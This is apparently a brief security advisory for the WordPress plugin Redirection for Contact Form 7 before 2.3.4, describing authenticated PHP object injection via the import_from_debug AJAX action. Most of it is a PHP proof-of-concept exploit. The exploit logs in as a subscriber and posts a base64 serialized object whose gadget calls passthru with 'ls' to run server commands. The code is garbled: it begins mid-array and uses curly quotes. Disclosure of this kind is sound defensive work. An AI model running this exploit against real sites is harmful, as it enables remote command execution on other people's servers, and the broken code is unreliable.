Redirection for Contact Form 7 < 2.3.4 - Authenticated PHP Object Injection

In the plugin, any authenticated user, such as a subscriber, could use the import_from_debug AJAX action to inject PHP objects.

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // OBJI $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-ajax.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘import_from_debug’, ‘data[debug_info]’ => ‘TzoxMjoiTWFnaWNNZXRob2RzIjoyOntzOjQ6InRvRG8iO3M6ODoicGFzc3RocnUiO3M6NToidG9TYXkiO3M6MjoibHMiO30=’ ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>